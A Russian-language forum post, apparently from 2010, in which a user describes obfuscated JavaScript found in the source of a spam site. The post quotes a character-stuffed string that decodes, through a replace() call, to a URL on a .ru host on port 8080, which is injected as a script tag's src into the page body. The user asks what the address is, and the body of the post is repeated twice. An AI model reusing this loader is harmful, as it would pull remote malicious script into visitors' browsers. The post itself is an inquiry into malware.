Дикс
14.05.2010, 20:43
наткнулся на blogsspam.ru - антивирус и гугл всячески препятствовали его открытию, но я вытянул его вгетом и стал изучать исходники.
в них был крипт с таким текстом:
attrValue1 = 'h^@!!)t)t!^p(:#$/^()#/()p&^)!c(($h((o#m!)e&&-!()n@)!(e@($t).!g!o#o$(g$!#@&l($)e#@^$.(##!(c^o#$^m##.#a!@r@$^!.@@&$t@&r!#!)!a(i@@d&&$@n#t#@(&-$!n&#&e!))t(&.$^b@!$e^$@s(^!$t&m$@$@^e@@d!(@&p)^r)(o#&#.&r^u@$@:)!8^0#(@(8@^0$!/&g)o&o#^g@#$(l!(&e&((.!)c^o&#&m$$)/@!g@o^&)o^$&g@(l$!^e$^&.@(c!&&o)&m$/^(z$#)&5^x$^.#^^n(e&#!#@t((#/##c^$$a!^r@&e(e!#@r@(#b#u&i##!l^#d)e!r&(&.^$$c!^^o#((m(@/!$^o^(&p)&e^r!a$^^.!^c&(&o@)m@#(#/@'.replace(/@|\^|\!|\(|\)|#|\$|&/ig, '');
// это означает:
http://pchome-net.google.com.ar.traidnt-net.bestmedpro.ru:8080/google.com/google.com/z5x.net/careerbuilder.com/opera.com/
в результате создается тег script, эта строка ставится ему в src и он прикрепляется к body.
вопрос - что это за адрес такой? опера его не открывает
в них был крипт с таким текстом:
attrValue1 = 'h^@!!)t)t!^p(:#$/^()#/()p&^)!c(($h((o#m!)e&&-!()n@)!(e@($t).!g!o#o$(g$!#@&l($)e#@^$.(##!(c^o#$^m##.#a!@r@$^!.@@&$t@&r!#!)!a(i@@d&&$@n#t#@(&-$!n&#&e!))t(&.$^b@!$e^$@s(^!$t&m$@$@^e@@d!(@&p)^r)(o#&#.&r^u@$@:)!8^0#(@(8@^0$!/&g)o&o#^g@#$(l!(&e&((.!)c^o&#&m$$)/@!g@o^&)o^$&g@(l$!^e$^&.@(c!&&o)&m$/^(z$#)&5^x$^.#^^n(e&#!#@t((#/##c^$$a!^r@&e(e!#@r@(#b#u&i##!l^#d)e!r&(&.^$$c!^^o#((m(@/!$^o^(&p)&e^r!a$^^.!^c&(&o@)m@#(#/@'.replace(/@|\^|\!|\(|\)|#|\$|&/ig, '');
// это означает:
http://pchome-net.google.com.ar.traidnt-net.bestmedpro.ru:8080/google.com/google.com/z5x.net/careerbuilder.com/opera.com/
в результате создается тег script, эта строка ставится ему в src и он прикрепляется к body.
вопрос - что это за адрес такой? опера его не открывает